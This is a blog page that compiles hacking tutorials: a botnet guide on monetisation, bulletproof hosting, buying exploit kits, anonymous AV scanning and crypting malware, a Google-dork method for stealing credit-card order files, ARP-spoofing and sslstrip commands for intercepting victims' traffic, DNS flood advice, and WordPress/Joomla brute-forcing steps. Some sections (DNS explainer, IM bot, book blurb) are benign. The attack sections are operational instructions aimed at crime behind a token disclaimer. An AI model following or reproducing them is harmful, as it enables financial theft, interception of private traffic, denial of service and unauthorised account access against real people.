Saturday, August 16, 2014

Botnet Tutorial

Botnet Q&A - The majority of answers are finally here !

This is created for those are confused or want to do a bit of research. Are you tired looking for answers ? Well if so, you came to right place.


Educational purposes only
What will this tutorial include ?

What is a botnet ?
What are botnets made for ?
How can you monetize/profit from them ?
Where to host them ?
Known DDoS Bots ?
How do cyber criminals get away with them ?
How do people get so many "bots/installs" ?
Types of botnets ?
What are honeypots ?
Anonymous scanning ?
Crypting my bin, making it undetectable ?

Topic 1 - What is a botnet ?
A botnet is a network of compromised computers, we call them zombies. The bot master can control all the computers using his command & control server where he can initiate various commands. He usually controls them via standards-based network protocols such as IRC and http. Most bot masters use IRC since its much more secure, but I personally prefer HTTP since its easier to control and manage in my opinion. If your too paranoid you should go with IRC, but beware ! If the feds want to get it, they will. To extend your knowledge I suggest visiting this article: !

Topic 2 - What are botnets made for ?
There are several purposes. Some people want to earn money, and they usually make a living by either coding them or using them to send spam,steal information, etc. Other people want to simply prove that they can, and brag about there abilities. They are made to either steal financial information, such as bank accounts, credit card details and other sensitive details. They are called banking bots, however I do not want to go into detail since this activity is disallowed. Some bots only have DDoS functions, used to launch DDoS attacks ( The majority of DDoS bots are HTTP-Based ). People either offer services once again to gain funds, others just do it for "pixels" to gain fame on the internet. Other bots send spam, and I recently noticed some bots that can turn them into socks, that can be very profitable since there is a high demand for private socks on the blackmarket. So there's 2 options and its your call, either money or fame. Extend your knowledge in this aspect, I suggest you to visit this: !

Topic 3 - How can you monetize/profit from them ?
Plenty of options, the most important is that you either have a large amount of bots or high quality countries, such as: US,UK,CA,AUS,FR and several other EU countries. Why high quality countries ? Since there is a thing called "PPI" ( Pay Per Install ). They demand the best countries, since there is more chance to advertise and the spec's are better, unlike Pakistan and Indonesia for example. Sending spam. This is the most common use for botnets, and is also one of the simplest. Experts estimate that over 80% of spam is sent from zombie computers. It should be noted that spam is not always sent by botnet owners: botnets are often rented by spammers. It's the spammers who understand the real value of botnets. According to our data, an average spammer makes $50,000 – $100,000 a year. Botnets made up of thousands of computers allow spammers to send millions of messages from infected machines within a very short space of time. DDoS attacks. Even here you can see that users profit, if you go the " Service Offerings " you could see plenty, but the majority of them simply buy 10 booters and think they run the scene. An experienced user would rather go with a private bot, for example: Dirt Jumper ( wich has been cracked ) is a really powerful tool made for websites, Pandora DDoS Bot ( notorious bot, some people say its good others give bad feedback ), G-Bot and more, most of you know these since I have seen a lot of topics where people were trying to set them up. This might be interesting ! : And how can I miss bitcoins, ah. This is probably the easiest way to profit from your net, by running a miner which will complete tasks, and it will generate " BTC ". Most pools payout via PayPal so its much easier to collect revenue. Note to get the best performance it is better to enable GPU, computers with ATI Radeon cards will generate more money, so watch out ! Luckily I have found an estimated earnings scheme for bot masters who do this activity.

Botnet mining per day
Bots Bot earnings per day Total earnings
100 x $0.03 $3
1,000 x $0.03 $30
10,000 x $0.03 $300
100,000 x $0.03 $3,000

Botnet mining per week
Bots Bot earnings per week Total earnings
100 x $0.23 $23
1,000 x $0.23 $230
10,000 x $0.23 $2,300
100,000 x $0.23 $23,000

Botnet mining per month
Bots Bot earnings per month Total earnings
100 x $0.97 $97
1,000 x $0.97 $970
10,000 x $0.97 $9,700
100,000 x $0.97 $97,000

I would say that isn't bad at all, say if I had 200 000 bots, I would probably work from home .

Topic 4 - Where to host them ?
It all depends. Say if you just wanted a small net, you would usually go with an offshore VPS ( I do not advise shared hosting ), make sure it isn't located in the US/UK & Germany and your all good. The best countries are probably: China, Taiwan, Iran, Ukraine, Singapore. Russia is "ok", they also have some strict laws, I do not understand why most users think that russian providers have immunity, that is not true. If your on a budget you could always hack a box, and host it there. But blame yourself once you get yourself removed, and all your database will be deleted, including your bots. Some users go advanced, if your hosting a large botnet and stealing details there is so called "BulletProof Hosting" which ignores all reports abuse, including DMCA, spamhaus, etc. You want a bulletproof host ? Well tough luck, shared hosting goes for more than a 100 bucks, and servers end at 800$. Really expensive, so your best call is to simply get an offshore location.

Topic 5 - Known DDoS Bots ?
I have stated a bit of information in another thread, I know most of you want a DDoS bot simply because with a press of a button you can cause massive chaos, and its possible. One of the strongest DDoS bot is Dirt Jumer, which is created specifically created to attack websites, methods such as: HTTP GET ( Sends GET requests ) - harder to block, HTTP POST, Synchronous Flood, Download Flood and an Anti-DDoS flood. The best thing I like about most bots these days is that they have random user agents, and change http headers and pretend to be legitimate traffic, that is really smart from the coders side, but they are usually really unstable, you would rather have a "loader" which is a type of bot which is really stable, you usually hold bots and it can act as a backbone for the DDoS bot, so you would 2 benefits, stability and power.

Topic 6 - How do cyber criminals get away with them ?
There are several methods, such as bulletproof hosting, which I already stated, and a common but interesting method which large botnets use it FastFlux, most of you do not know what that is and I suggest you to read. Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies. It can also refer to the combination of peer-to-peer networking, distributed command and control, web-based load balancing and proxy redirection used to make malware networks more resistant to discovery and counter-measures. The Storm Worm is one of the recent malware variants to make use of this technique.
The basic idea behind Fast flux is to have numerous IP addresses associated with a single fully qualified domain name, where the IP addresses are swapped in and out with extremely high frequency, through changing DNS records.

- Credits to wikipedia.

Obviously you wouldn't have that if your starting off, so what I would suggest to do, is simply get a cheap VPS, with 128mb of ram and setup a reverse proxy, that will work for you. These are probably the only methods I know at the moment.

Topic 7 - How do people get so many "bots/installs" ?
This is interesting, many of you have wondered how people get so many bots and sell them, thousands ! That's right, thousands. They either have some next "ub3r" spreading skills, which they don't or they buy an exploit kit. What is an exploit kit ? It's a type of crime ware which scans the computer for un-patched exploits, you could say its a Silent Driveby, but only say 10% will download the file, so that's why they get bulk traffic (real visitors) and send it to their exploit link, then some percentage % of the traffic gets generated into installs. Usually people get low quality countries such as: Pakistan, Indonesia, Egypt since they don't know what an anti-virus is and they have pirated version of windows. Your probably interested, but the cheapest packs go for 600$ monthly, but its a wise investment, of course if you know what your doing.

Most common exploit kit:

List of exploit kits:

Topic 8 - Types of botnets ?

DDoS Bots - To initiate DDoS attacks on servers.

Banking Bots - Identity theft. ( Don't want to go into detail )

Spam Bots - To send out spam.

Socks Bots - To create socks4/socks5 proxies.

BitCoin Bots - To generate a virtual currency called " BTC ".

Loaders - To hold bots in a stable environment.

Topic 9 -What are honeypots ?

What is a honeypot, if you consider getting into botnets you should know. If you catch a honeypot, it would probably be some experienced user who wants to trace your botnet, or another hacker who want's to get into your botnet and steal some bots or a pig. Once you catch a honeypot, your bot will be analyzed and it will be traced. The incoming packets will be sniffed and your panel could be easily compromised within seconds. That's about it for you to know, there's not much you can say and do about it. .

A really useful resource:

I suggest everyone to visit, and you would understand how it works.

Topic 10 - Anonymous scanning ?
Some of you simply scan with novirusthanks, or virustotal. That is probably the most wrong thing to do in your journey, never ever scan with them unless you want your files detected. I would strongly recommend anonymous scanning servers, those who don't distribute your file to the AV companies, so once its scanned it won't be analyzed by anyone. I recommend the following services:

Those are the 2 I know, and I can assure that you will receive quality scanning services with them.

Topic 11 - Crypting my bin, making it undetectable ?
This is important, most bins will be detected by most anti-viruses, and we do not want that, since there will be a lower % of executions from the installs we either purchase or spread. I strongly recommend crypters coded in native languages, since the stubs are usually smaller and the execution rate will be higher, however if your looking for long-lasting stubs you would rather go with a Visual Basic stubs, since it doesn't look that suspicious. I recommend: Father Crypter, Root Crypt. I haven't seen decent crypters here, but I heard some good feedback about: Remember to run an update on your bots on a regular basis, so you won't loose any machines.

1.Useful Videos: - Botnets Part 1 - Botnets Part 2 - Botnets Part 3 - Rootkits

U-file Credit Card Database Hacking

I have only just found this elsewhere so have not yet tried it but thought i would share for all here

This is a basic tutorial for hacking u-file database order forms
it will teach you how to get u-file cc database so lets start


open this link
as you can see its an order form page.

1st step : (all you need to do is to view the source) go to view tab
then click the page source or view source.after you have viewed the source the

2nd step : (prest ctrl f then find u-file=) after you have found the “u-file=”
you will see this code all you need to get from the u-file is the “_private/form_results.txt”

3rd step :after getting the u-file this will be the last step just put the
u-file code besides the website like this.


how to search in google : flowers orderform .htm | u-file=
so it will base on the string you use in searching for u-file database

here you go enjoy.

Best Way to Sniff HTTP and HTTPS Websites

Its not tough to Hijack / Capture / Sniff Wifi Traffic on almost any network as long as you are connected to it. Once you apply all the correct tricks, all future traffic for Wifi clients i.e. laptops, mobiles will be routed from your PC, giving you every bit of information about what others are doing on the network.

How to Hijack/Capture/ Sniff HTTP traffic

We will be using ARP and iptables on a Linux machine to accomplish most of the stuff. It’s an easy and fun way to harass your friends, family, or flatmates while exploring the networking protocols.

Warning:- Do not attempt to do this on a Public Wifi or a Corporate Wifi. Doing so could lead you to serious consequences. In no way is Taranfx or Hack Community responsible for any harms. This is solely intended for fun @ home.

Lets take 3 PCs into reference for our activity:

* Real gateway router: IP address, MAC address 48:5d:34:aa:c6:aa
* Fake gateway: A Laptop PC called hacker-laptop, IP address, MAC address c0:30:2b:47:ef2:74
* Victim: a laptop on wireless called victim-laptop, IP address, MAC address 00:23:6c:8f:3f:95

The gateway router, like most modern routers, is bridging between the wireless and wired domains, so ARP packets get broadcast to both domains.

Step 1: Enable IPv4 forwarding

Unless IP forwarding is enabled, hacker-laptop won’t receive all the network traffic because the networking subsystem is going to ignore packets that aren’t destined for us. So step 1 is to enable IP forwarding. To enable it, set a non zero value like:

root@hacker-laptop:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2: Set routing rules

We want to set rules so that all traffic routes through hacker-laptop, acting like a NAT router. Just like a typical NAT, it would rewrite the destination address in the IP packet headers to be its own IP address.

This can be done as follows:

doxhacker@hacker-laptop:~$ sudo iptables -t nat -A PREROUTING \
> -p tcp –dport 80 -j NETMAP –to

The iptables command has 3 components:

* When to apply a rule (-A PREROUTING)
* What packets get that rule (-p tcp –dport 80)
* The actual rule (-t nat … -j NETMAP –to

What above command does: If you’re a TCP packet destined for port 80 (HTTP traffic), actually make my address,, the destination, NATting both ways so this is transparent to the source.”

Step 3: Adding IP address to interface

The networking subsystem will not allow you to ARP for a random IP address on an interface — it has to be an IP address actually assigned to that interface:

doxhacker@hacker-laptop:~$ sudo ip addr add dev eth0

and verify that the original IP address, and the gateway address

doxhacker@hacker-laptop:~$ ip addr

3: eth0: mtu 1500 qdisc noqueue state UNKNOWN
link/ether c0:30:2b:47:ef2:74 brd ff:ff:ff:ff:ff:ff
inet brd scope global eth0
inet scope global secondary eth0
inet6 fe80::230:1bff:fe47:f274/64 scope link
valid_lft forever preferred_lft forever

Step 4: Responding to HTTP requests
hacker-laptop would need a HTTP server setup. It could be any damn server, I used Apache for ease of use. Here you can get creative, e.g. respond with random pages for specific URLs or define a local URL e.g.

Step 5: Test pretending to be the gateway

Most of the things are already done and our hacker-laptop is ready to pretend as the Wifi Gateway, but the trouble is convincing victim-laptop that the MAC address for the gateway has changed, to that of hacker-laptop.

The solution is to send a Gratuitous ARP, which says "I know nobody asked, but I have the MAC address for”. Machines that hear that Gratuitous ARP will replace an existing mapping from to a MAC address in their ARP caches with the mapping advertised in that Gratuitous ARP.
There are lots of command line utilities and bindings in various programming language that make it easy to issue ARP packets. I used the arping tool:

doxhacker@hacker-laptop:~$ sudo arping -c 3 -A -I eth0

We’ll send a Gratuitous ARP reply (-A), three times (-c -3), on the eth0 interface (-l eth0) for IP address

This can be then verified on the victim’s machine using "arp -a” command

Bingo! victim-laptop now thinks the MAC address for IP address is 0:30:1b:47:f2:74, which is hacker-laptop’s address.If I try to browse the web on victim-laptop, I am served the resource matching the rules in hacker-laptop’s web server.

That means all of the non-HTTP traffic associated with viewing a web page still happens as normal. In particular, when hacker-laptop gets the DNS resolution requests for, the test site I visited, it will follow its routing rules and forward them to the real router, which will send them out to the Internet:

The fact is that hacker-laptop has rerouted and served the request is totally transparent to the client at the IP layer and victim-laptop has no clue.

Undo the changes

So, you had enough fun and wish to revert? Here we go:

doxhacker@hacker-laptop:~$ sudo ip addr delete dev eth0

doxhacker@hacker-laptop:~$ sudo iptables -t nat -D PREROUTING -p tcp –dport 80 -j NETMAP –to

To get the client machines to believe the router is the real gateway, you might have to clear the gateway entry from the ARP cache with arp -d, or bring your interfaces down and back up.

Hacking HTTPS Websites

If you want to sniff websites having https environment then you should try SSL Strip it helps you to sniff https sites. Like Gmail Yahoo And Facebook.


tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(optional) sudo python ./ install
Running sslstrip

Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)

Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)

Run sslstrip. ( -l <listenPort>)

Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)

Hacking Cable Modem + Wireless Hacking

In the beginning there was dial-up, and it was slow; then came broadband in the form of cable, which redefined how we access the internet, share information, and communicate with each other online. Hacking the Cable Modem goes inside the device that makes internet via cable possible and, along the way, reveals secrets of many popular cable modems, including products from Motorola, RCA, WebSTAR, D-Link, and more.

* Inside Hacking the Cable Modem, you'll learn: the history of cable modem hacking
* how a cable modem works
* the importance of firmware (including multiple ways to intall new firmware)
* how to unblock network ports and unlock hidden features
* how to hack and modify your cable modem
* what uncapping is and how it makes cable modems upload and download faster

Written for people at all skill levels, the book features step-by-step tutorials with easy to follow diagrams, source code examples, hardware schematics, links to software (exclusive to this book!), and previously unreleased cable modem hacks.


How to create your own im bot

This quick tutorial will show you how to develop your own functional IM bot that works with Google Talk, Yahoo! Messenger, Windows Live and all other popular instant messaging clients.
To get started, all you need to know are some very basic programming skills (any language would do) and web space to host your “bot”.

For this example, I have created a dummy bot called “insecure” that listens to your IM messages.

If you like to write a personal IM bot, just follow these simple steps:-

Step 1: Go to and register a new account with a bot.

Step 2: Now it’s time to create a bot which is actually a simple script that resides on your public web server.
It could be in PHP, Perl, Python or any other language.

Example Hello World bot:
The example below illustrates just how easy it is to create a bot.
This example is coded in PHP.

switch ($_REQUEST['step']) {
case 1:
echo "Hi, what's your name?";
case 2:
echo "Hi " . $_REQUEST['value1'] . ", where do you live?";
case 3:
echo "Well, welcome to this hello world bot, " . $_REQUEST['value1'] . "<br>from " . $_REQUEST['value2'] . ".<reset>";


Step 3: Once your script is ready, put it somewhere on your web server and copy the full URL to the clipboard.

Step 4: Now login to your imified account

Step 5: Add that im bot your friends list. That’s it.

This is a very basic bot but the possibilities are endless.

For instance, you could write a bot that will send an email to all your close friends via a simple IM message. Or you could write one that will does currency conversion.

How does DNS work [Newbie Tutorial]

The internet uses DNS (Domain Name System) records to translate host names into IP addresses (in this case and in some cases vice versa too. When you type the DNS of a website into your browser (which I would hope is Firefox or Opera, and not IE) it begins looking up the host. To do this, it sends a packet of data to one of 13 pre-programmed root nameservers. Surprisingly, there are only 13 root nameservers in the world! Some are government operated (e.g. NASA, DISA) and some are run by large companies such as VeriSign and Cogent. Just in case you think “oh, that seems easy to attack”, it’s not – they run load distribution systems that can repel more than a 5TB/s DDoS with little more than a slight slowdown in service. The purpose of these name servers is to tell clients (e.g. your web browser) where the name server is for the host you are requesting, so that it can go ask that server for more information. These requests are made using UDP (User Datagram Protocol) port 53. Sometimes this process is recursive, propogating down multiple levels of DNS servers before you get an authoratitive response. Here’s an example:

1) Your web browser asks a root nameserver about
2) It replies: The nameserver has that information.
3) Your web browser asks about It replies: The nameserver has that information.
5) Your web browser asks about
6) It replies: The nameserver has that information.
7) Your web browser asks about
It replies: The authoratitive IP address of is

See how that works? Each name server passed the buck to the next one, until you finally got an answer from someone who knows it. The authorititive IP address, also known as the A record, is stored as a DNS entry on the name server. Other records, such as MX (mail server) and CNAME (canonical name, i.e. an alias) are also stored in the domain record. A service called ‘whois’ exists to get the contents of these records. There are hundreds of websites that let you perform a whois. My favourite is but as I said there are hundreds out there. These records often include the name, address and telephone number of the person who registered the domain, as well as the name and telephone number of the company that leases the domain to that person. Private individuals can opt out of the whois lookup to prevent privicy issues.

If you were to attack a nameserver, you could flood it with UDP packets on port 53 in order to cause large amounts of processing to be done on the server that runs it. This would mean that normal DNS traffic would not always get processed and the users would not be able to resolve the domain’s IP, resulting in a denial of service. In combination with a TCP SYN flood on port 80 of the server itself, a DNS flood can take out a website completely, given enough resources.


Brute Forcing WordPress & Joomla Websites

So today we will learn how to Brute force Wordpress & Joomla websites ( As title says )

Many people have been asking me how to brute force it and well you will know now

We will be using a perl script to do this so you'll be needing Active Perl

Download Here ===>

First of all what is Brute forcing?

It is a trial and error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys.

Exactly just as a hacker might break into, or "crack" a safe by trying many possible combinations, a brute force cracking application proceeds through all possible combinations of legal characters in sequence.

Lets go!


You'll be needing the Perl Brute forcer Made by B47CHGURU (Credits to him)

Download Here====>

Extract all the files to " C:\ " (or any where)

Now open CMD (Command Prompt)

Go to your Path ( where u extracted the zip file, e.g " C:\Invectus " )

Type in the command " perl "

Now it will ask you:

Do you want to do reverseip or load website list from file..?(y/n)>

You can load a website list such as list.txt or you could enter the IP address and it will scan the whole server, i prefer choosing reverseip option cause it scans everything on server

For website list enter " n "
For reverseip enter " y "

So lets say we enter " y "

IP/Website you want to reverse..? >

Now just enter the IP or Website URL you want to reverse

It will start scanning, directly after scanning it will show you the results in a HTML File (invectus.html)

It will come up as or /wp-login.php (It depends) admin 123456

And now you can login and do whatever you want

Hope you enjoyed reading this tutorial!